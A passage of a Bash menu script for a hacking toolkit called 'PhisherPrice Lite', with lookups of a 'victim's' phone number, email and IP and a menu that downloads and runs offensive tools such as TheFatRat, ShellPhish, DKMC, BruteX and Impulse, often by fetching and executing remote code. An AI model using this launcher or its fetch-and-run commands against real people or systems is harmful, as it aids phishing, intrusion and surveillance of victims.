Press ENTER to Main Menu ' 1617 | echo ' ' 1618 | read 1619 | 1620 | elif [ "$x" == "$submenu312" ]; then #submenu3-Option-12 1621 | clear 1622 | echo -e '\e[0;31m-------------------------------\e[1;33m 1623 | PHONE NUMBER CHECKER 1624 | \e[0;31m-------------------------------\e[1;34m' 1625 | echo "Victim's Number" 1626 | echo -e '\e[0;31m-------------------------------' 1627 | read -p "~" r 1628 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1629 | curl https://api.telnyx.com/anonymous/v2/number_lookup/$r 1630 | echo ' ' 1631 | echo ' Press ENTER to Main Menu ' 1632 | echo ' ' 1633 | read 1634 | 1635 | elif [ "$x" == "$submenu313" ]; then #submenu3-Option-13 1636 | clear 1637 | echo -e '\e[0;31m-------------------------------\e[1;33m 1638 | H8MAIL EMAIL LOOKUP 1639 | \e[0;31m-------------------------------\e[1;34m' 1640 | echo "Victim's Email" 1641 | echo -e '\e[0;31m-------------------------------' 1642 | read -p "~" r 1643 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1644 | h8mail -t $r 1645 | echo ' ' 1646 | echo ' Press ENTER to Main Menu ' 1647 | echo ' ' 1648 | read 1649 | 1650 | elif [ "$x" == "$submenu314" ]; then #submenu3-Option-14 1651 | clear 1652 | echo -e '\e[0;31m-------------------------------\e[1;33m 1653 | H8MAIL USERNAME LOOKUP 1654 | \e[0;31m-------------------------------\e[1;34m' 1655 | echo "Username To Search" 1656 | echo -e '\e[0;31m-------------------------------' 1657 | read -p "~" r 1658 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1659 | h8mail -t $r -q username -k "dehashed_email=user@email.com" "dehashed_key=ABCDE123" 1660 | echo ' ' 1661 | echo ' Press ENTER to Main Menu ' 1662 | echo ' ' 1663 | read 1664 | 1665 | elif [ "$x" == "$submenu315" ]; then #submenu3-Option-15 1666 | clear 1667 | echo -e '\e[0;31m-------------------------------\e[1;33m 1668 | H8MAIL IP LOOKUP 1669 | \e[0;31m-------------------------------\e[1;34m' 1670 | echo "ip To Search" 1671 | echo -e '\e[0;31m-------------------------------' 1672 | read -p "~" r 1673 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1674 | cd&&h8mail -t $r -q ip -ch 2 --power-chase 1675 | echo ' ' 1676 | echo ' Press ENTER to Main Menu ' 1677 | echo ' ' 1678 | read 1679 | 1680 | elif [ "$x" == "$submenu316" ]; then #submenu3-Option-19 1681 | clear 1682 | 1683 | cd&&python3 cfresolve.py 1684 | 1685 | read 1686 | elif [ "$x" == "$submenu317" ]; then #submenu3-Option-15 1687 | clear 1688 | echo -e '\e[0;31m-------------------------------\e[1;33m 1689 | WhatWeb LOOKUP 1690 | \e[0;31m-------------------------------\e[1;34m' 1691 | echo "Target" 1692 | echo -e '\e[0;31m-------------------------------' 1693 | read -p "~" r 1694 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1695 | whatweb -v -a 3 $r 1696 | echo ' ' 1697 | echo ' Press ENTER to Main Menu ' 1698 | echo ' ' 1699 | read 1700 | else 1701 | n 1702 | fi 1703 | 1704 | elif [ "$x" == "$option5" ]; then #Option3 1705 | clear 1706 | echo -e '\e[1;33m 1707 | ///, //// 1708 | \ /, / >. 1709 | \ /, _/ /. 1710 | \_ /_/ /. 1711 | \__/_ < PhisherPrice Lite 1712 | /<<< \_\_ Serve & Demolish 1713 | /,)^>>_._ \ Version 1.0.3 [BETA] 1714 | (/ \\ /\\\ [\e[3;31m PUBLIC \e[1;33m] 1715 | // //``` 1716 | ------((`((--------------------\e[3;31m 1717 | Download & Install Other Tools \e[1;33m 1718 | ------------------------------- \e[0m\e[3;39m- 1719 | (1) SpiderFoot 1720 | (2) Th3Inspector 1721 | (3) Sherlock 1722 | (4) PhoneInfoga 1723 | (5) BruteX 1724 | (6) WifiPumpkin3 1725 | (7) DroneSploit 1726 | (8) DirSearch 1727 | (9) H8Mail 1728 | (10) OSR Framework 1729 | (11) ShellPhish 1730 | (12) FatRat 1731 | (13) PRETty 1732 | (14) PhoneSploit 1733 | (15) Veil Framework 1734 | (16) Dont KIll My Cat 1735 | (17) RedGhost 1736 | (18) TorGhost 1737 | (19) KillTheGibson 1738 | (20) Impulse \e[1;33m 1739 | ------------------------------- \e[0m\e[3;39m 1740 | CTRL + C To Exit \e[1;33m 1741 | ------------------------------- \e[0m\e[3;39m 1742 | Press ENTER To Go To Main Menu \e[1;33m 1743 | ------------------------------- \e[0m\e[3;39m' 1744 | echo -e $Blue" ┌─["$red"S&D$Blue]──[$red~$Blue]─["$yellow"Other Tools$Blue]" 1745 | read -p " └─────► " x 1746 | submenu41='1' 1747 | submenu42='2' 1748 | submenu43='3' 1749 | submenu44='4' 1750 | submenu45='5' 1751 | submenu46='6' 1752 | submenu47='7' 1753 | submenu48='8' 1754 | submenu49='9' 1755 | submenu410='10' 1756 | submenu411='11' 1757 | submenu412='12' 1758 | submenu413='13' 1759 | submenu414='14' 1760 | submenu415='15' 1761 | submenu416='16' 1762 | submenu417='17' 1763 | submenu418='18' 1764 | submenu419='19' 1765 | submenu420='20' 1766 | 1767 | if [ "$x" == "$submenu41" ]; then #submenu4-Option-1 1768 | clear 1769 | echo -e '\e[0;31m-------------------------------\e[1;33m 1770 | SpiderFoot Installation 1771 | \e[0;31m-------------------------------\e[1;34m' 1772 | echo "Are You Sure You Want To Install SpiderFoot" 1773 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1774 | echo -e '\e[0;31m-------------------------------' 1775 | read -p "~" r 1776 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1777 | $r cd&&git clone https://github.com/smicallef/spiderfoot.git&&cd spiderfoot&&pip3 install -r requirements.txt&&firefox "https://www.spiderfoot.net/documentation/" 1778 | read 1779 | elif [ "$x" == "$submenu42" ]; then #submenu4-Option-2 1780 | clear 1781 | echo -e '\e[0;31m-------------------------------\e[1;33m 1782 | Th3inspector Installation 1783 | \e[0;31m-------------------------------\e[1;34m' 1784 | echo "Are You Sure You Want To Install Th3inspector" 1785 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1786 | echo -e '\e[0;31m-------------------------------' 1787 | read -p "~" r 1788 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1789 | $r cd&&git clone https://github.com/Moham3dRiahi/Th3inspector.git&&cd Th3inspector&&chmod +x install.sh && ./install.sh 1790 | read 1791 | 1792 | elif [ "$x" == "$submenu43" ]; then #submenu4-Option-3 1793 | clear 1794 | echo -e '\e[0;31m-------------------------------\e[1;33m 1795 | Sherlock Installation 1796 | \e[0;31m-------------------------------\e[1;34m' 1797 | echo "Are You Sure You Want To Install Sherlock ?" 1798 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1799 | echo -e '\e[0;31m-------------------------------' 1800 | read -p "~" r 1801 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1802 | $r cd&&git clone https://github.com/sherlock-project/sherlock.git&&cd sherlock&&python3 -m pip install -r requirements.txt 1803 | echo "succefully installed sherlock" 1804 | read 1805 | 1806 | 1807 | elif [ "$x" == "$submenu44" ]; then #submenu4-Option-4 1808 | clear 1809 | echo -e '\e[0;31m-------------------------------\e[1;33m 1810 | PhoneInfoga Installation 1811 | \e[0;31m-------------------------------\e[1;34m' 1812 | echo "this requires docker to be installed and a reboot is required" 1813 | echo "Are You Sure You Want To Install PhoneInfoga ?" 1814 | echo "1) Install docker" 1815 | echo "2) Install Phoneinfoga" 1816 | optioninstall='1' 1817 | optioninstall1='2' 1818 | echo -e '\e[0;31m-------------------------------' 1819 | read -p "~" r 1820 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1821 | if [ "$r" == "$optioninstall" ]; then 1822 | # Install dependencies. 1823 | sudo apt install -y curl apt-transport-https \ 1824 | software-properties-common ca-certificates 1825 | # Install docker. 1826 | curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - 1827 | echo "deb [arch=amd64] https://download.docker.com/linux/debian stretch stable" | \ 1828 | sudo tee /etc/apt/sources.list.d/docker-engine.list 1829 | sudo apt-get update -y 1830 | sudo apt-get install -y docker-ce 1831 | # Run docker. 1832 | sudo systemctl start docker 1833 | sudo systemctl enable docker 1834 | # Add user to docker group for using docker without sudo command. 1835 | sudo gpasswd -a "${USER}" docker 1836 | sudo reboot 1837 | elif [ "$r" == "$optioninstall1" ]; then 1838 | docker pull sundowndev/phoneinfoga:latest&&docker run --rm -it sundowndev/phoneinfoga version 1839 | echo "succefully installed phoneinfoga" 1840 | read 1841 | else 1842 | n 1843 | fi 1844 | 1845 | elif [ "$x" == "$submenu45" ]; then #submenu4-Option-5 1846 | clear 1847 | echo -e '\e[0;31m-------------------------------\e[1;33m 1848 | BruteX Installation 1849 | \e[0;31m-------------------------------\e[1;34m' 1850 | echo "Are You Sure You Want To Install BruteX ?" 1851 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1852 | echo -e '\e[0;31m-------------------------------' 1853 | read -p "~" r 1854 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1855 | $r cd&&git clone https://github.com/1N3/BruteX&&cd BruteX&&./install.sh 1856 | echo "succefully installed BruteX" 1857 | read 1858 | read 1859 | 1860 | elif [ "$x" == "$submenu46" ]; then #submenu4-Option-6 1861 | clear 1862 | echo -e '\e[0;31m-------------------------------\e[1;33m 1863 | wifipumpkin3 Installation 1864 | \e[0;31m-------------------------------\e[1;34m' 1865 | echo "Are You Sure You Want To Install wifipumpkin3 ?" 1866 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1867 | echo -e '\e[0;31m-------------------------------' 1868 | read -p "~" r 1869 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1870 | $r sudo apt install python3.7-dev libssl-dev libffi-dev build-essential python3&&sudo apt install python3-pyqt5&&cd&&git clone https://github.com/P0cL4bs/wifipumpkin3.git&&cd wifipumpkin3&&sudo python3 setup.py install 1871 | echo "succefully installed wifipumpkin3" 1872 | read 1873 | 1874 | elif [ "$x" == "$submenu47" ]; then #submenu4-Option-7 1875 | clear 1876 | echo -e '\e[0;31m-------------------------------\e[1;33m 1877 | Dronesploit Installation 1878 | \e[0;31m-------------------------------\e[1;34m' 1879 | echo "Are You Sure You Want To Install Dronesploit" 1880 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1881 | echo -e '\e[0;31m-------------------------------' 1882 | read -p "~" r 1883 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1884 | $r cd&&sudo pip3 install dronesploit 1885 | read 1886 | 1887 | elif [ "$x" == "$submenu48" ]; then #submenu4-Option-8 1888 | clear 1889 | echo -e '\e[0;31m-------------------------------\e[1;33m 1890 | dirsearch Installation 1891 | \e[0;31m-------------------------------\e[1;34m' 1892 | echo "Are You Sure You Want To Install dirsearch" 1893 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1894 | echo -e '\e[0;31m-------------------------------' 1895 | read -p "~" r 1896 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1897 | $r cd&&git clone https://github.com/maurosoria/dirsearch.git 1898 | read 1899 | 1900 | 1901 | elif [ "$x" == "$submenu49" ]; then #submenu4-Option-9 1902 | clear 1903 | echo -e '\e[0;31m-------------------------------\e[1;33m 1904 | H8mail Installation 1905 | \e[0;31m-------------------------------\e[1;34m' 1906 | echo "Are You Sure You Want To Install H8mail" 1907 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1908 | echo -e '\e[0;31m-------------------------------' 1909 | read -p "~" r 1910 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1911 | $r cd&&sudo pip3 install h8mail 1912 | read 1913 | 1914 | elif [ "$x" == "$submenu410" ]; then #submenu4-Option-10 1915 | clear 1916 | echo -e '\e[0;31m-------------------------------\e[1;33m 1917 | osrframework Installation 1918 | \e[0;31m-------------------------------\e[1;34m' 1919 | echo "Are You Sure You Want To Install osrframework" 1920 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1921 | echo -e '\e[0;31m-------------------------------' 1922 | read -p "~" r 1923 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1924 | $r cd&&sudo pip3 install osrframework 1925 | read 1926 | 1927 | elif [ "$x" == "$submenu411" ]; then #submenu4-Option-11 1928 | clear 1929 | echo -e '\e[0;31m-------------------------------\e[1;33m 1930 | shellphish Installation 1931 | \e[0;31m-------------------------------\e[1;34m' 1932 | echo "Are You Sure You Want To Install shellphish" 1933 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1934 | echo -e '\e[0;31m-------------------------------' 1935 | read -p "~" r 1936 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1937 | $r git clone https://github.com/NULL-SECURITY-TEAM/shellphish&&cd shellphish&&chmod +x shellphish.sh 1938 | echo "done" 1939 | read 1940 | 1941 | elif [ "$x" == "$submenu412" ]; then #submenu4-Option-12 1942 | clear 1943 | echo -e '\e[0;31m-------------------------------\e[1;33m 1944 | FatRat Installation 1945 | \e[0;31m-------------------------------\e[1;34m' 1946 | echo "Are You Sure You Want To Install FatRat" 1947 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1948 | echo -e '\e[0;31m-------------------------------' 1949 | read -p "~" r 1950 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1951 | $r cd&&git clone https://github.com/Screetsec/TheFatRat.git&&cd TheFatRat&&chmod +x setup.sh &&sudo ./setup.sh 1952 | echo "done" 1953 | read 1954 | 1955 | elif [ "$x" == "$submenu413" ]; then #submenu4-Option-13 1956 | clear 1957 | echo -e '\e[0;31m-------------------------------\e[1;33m 1958 | PreTty Installation 1959 | \e[0;31m-------------------------------\e[1;34m' 1960 | echo "Are You Sure You Want To Install PreTty" 1961 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1962 | echo -e '\e[0;31m-------------------------------' 1963 | read -p "~" r 1964 | echo -e '\e[0;31m-------------------------------\e[0S;39m' 1965 | $r cd&&git clone https://github.com/RUB-NDS/PRET&&cd PRET&&pip install colorama pysnmp 1966 | echo "INSTALLATION COMPLETE" 1967 | read 1968 | elif [ "$x" == "$submenu414" ]; then #submenu4-Option-14 1969 | clear 1970 | echo -e '\e[0;31m-------------------------------\e[1;33m 1971 | PreTty Installation 1972 | \e[0;31m-------------------------------\e[1;34m' 1973 | echo "Are You Sure You Want To Install PreTty" 1974 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1975 | echo -e '\e[0;31m-------------------------------' 1976 | read -p "~" r 1977 | echo -e '\e[0;31m-------------------------------\e[0S;39m' 1978 | $r cd&&git clone https://github.com/SirCryptic/PS&&cd PS&&pip install colorama&&python2 ps.py 1979 | echo "INSTALLATION COMPLETE LAUNCHING PHONESPLOIT" 1980 | read 1981 | 1982 | elif [ "$x" == "$submenu415" ]; then #submenu4-Option-15 1983 | clear 1984 | echo "Sub Option 15" 1985 | 1986 | read 1987 | 1988 | elif [ "$x" == "$submenu416" ]; then #submenu4-Option-16 1989 | clear 1990 | echo -e '\e[0;31m-------------------------------\e[1;33m 1991 | DONT KILL MY CAT Installation 1992 | \e[0;31m-------------------------------\e[1;34m' 1993 | echo "Are You Sure You Want To Install DKMC " 1994 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1995 | echo -e '\e[0;31m-------------------------------' 1996 | read -p "~" r 1997 | echo -e '\e[0;31m-------------------------------\e[0S;39m' 1998 | $r cd&&git clone https://github.com/Mr-Un1k0d3r/DKMC&&cd DKMC&&mkdir output&&python dkmc.py 1999 | echo "INSTALLATION COMPLETE LAUNCHING DKMC" 2000 | 2001 | read 2002 | 2003 | 2004 | elif [ "$x" == "$submenu417" ]; then #submenu4-Option-17 2005 | clear 2006 | echo -e '\e[0;31m-------------------------------\e[1;33m 2007 | RedGhost Installation 2008 | \e[0;31m-------------------------------\e[1;34m' 2009 | echo "Are You Sure You Want To Install RedGhost " 2010 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 2011 | echo -e '\e[0;31m-------------------------------' 2012 | read -p "~" r 2013 | echo -e '\e[0;31m-------------------------------\e[0S;39m' 2014 | $r cd&&wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh 2015 | echo "INSTALLATION COMPLETE, Launching RedGhost" 2016 | 2017 | read 2018 | 2019 | elif [ "$x" == "$submenu418" ]; then #submenu4-Option-18 2020 | clear 2021 | echo -e '\e[0;31m-------------------------------\e[1;33m 2022 | TorGhost Installation 2023 | \e[0;31m-------------------------------\e[1;34m' 2024 | echo "Are You Sure You Want To Install TorGhost" 2025 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 2026 | echo -e '\e[0;31m-------------------------------' 2027 | read -p "~" r 2028 | echo -e '\e[0;31m-------------------------------\e[0;39m' 2029 | $r cd&&git clone https://github.com/SusmithKrishnan/torghost.git&&cd torghost&&chmod +x build.sh&&./build.sh&&bash install.sh 2030 | echo -e '\e[0;31m-------------------------------\e[1;33m 2031 | Fully Installed Torghost 2032 | \e[0;31m-------------------------------\e[1;34m' 2033 | echo "Press ENTER To Go Back To Main Menu" 2034 | echo -e '\e[0;31m-------------------------------' 2035 | read -p "~" 2036 | echo -e '\e[0;31m-------------------------------\e[0;39m' 2037 | 2038 | elif [ "$x" == "$submenu419" ]; then #submenu4-Option-19 2039 | clear 2040 | echo -e '\e[0;31m-------------------------------\e[1;33m 2041 | KillTheGibson Installation 2042 | \e[0;31m-------------------------------\e[1;34m' 2043 | echo "Are You Sure You Want To Install KIllTheGibson" 2044 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 2045 | echo -e '\e[0;31m-------------------------------' 2046 | read -p "~" r 2047 | echo -e '\e[0;31m-------------------------------\e[0;39m' 2048 | $r cd&&https://github.com/m57/KillTheGibson&&cd KillTheGibson&&chmod +x killthegibson.sh&&./killthegibson.sh 2049 | echo "Download Complete , Launching KillTheGibson" 2050 | 2051 | elif [ "$x" == "$submenu420" ]; then #submenu4-Option-19 2052 | clear 2053 | echo -e '\e[0;31m-------------------------------\e[1;33m 2054 | Impulse Installation 2055 | \e[0;31m-------------------------------\e[1;34m' 2056 | echo "Are You Sure You Want To Install Impulse" 2057 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 2058 | echo -e '\e[0;31m-------------------------------' 2059 | read -p "~" r 2060 | echo -e '\e[0;31m-------------------------------\e[0;39m' 2061 | $r git clone https://github.com/LimerBoy/Impulse&&cd Impulse&&pip3 install -r requirements.txt&&python3 impulse.py --help 2062 | echo "Installation Complete" 2063 | 2064 | read 2065 | 2066 | else 2067 | 2068 | n 2069 | 2070 | 2071 | fi 2072 | elif [ "$x" == "$info" ]; then #INFO 2073 | clear 2074 | echo -e '\e[1;33m 2075 | ///, //// 2076 | \ /, / >. 2077 | \ /, _/ /. 2078 | \_ /_/ /. 2079 | \__/_ < PhisherPrice Lite 2080 | /<<< \_\_ Serve & Demolish 2081 | /,)^>>_._ \ Version 1.0.3 [BETA] 2082 | (/ \\ /\\\ [\e[3;31m PUBLIC \e[1;33m] 2083 | // //``` 2084 | ------((`((--------------------\e[3;31m 2085 | Information \e[1;33m 2086 | ------------------------------- \e[0m\e[3;39m 2087 | Created By\e[1;31m SirCryptic~\e[1;36mSCNS \e[1;34m 2088 | Null Security Team 2089 | 2090 | \e[1;31m Contact Information \e[1;33m 2091 | ------------------------------ \e[0m 2092 | no-reply@nullsec.online 2093 | https://nullsec.online 2094 | 2095 | we are not liable for any individual or damage 2096 | by this tool 2097 | \e[1;33m 2098 | ------------------------------- \e[0m\e[3;39m 2099 | CTRL + C To Exit \e[1;33m 2100 | ------------------------------- \e[0m\e[3;39m 2101 | Press ENTER To Go To Main Menu \e[1;33m 2102 | ------------------------------- \e[0m\e[3;39m' 2103 | echo -e $Blue" ┌─["$red"S&D$Blue]──[$red~$Blue]─["$yellow"Information$Blue]" 2104 | read -p " └─────► " x 2105 | 2106 | else 2107 | 2108 | n 2109 | 2110 | 2111 | fi 2112 | done 2113 | --------------------------------------------------------------------------------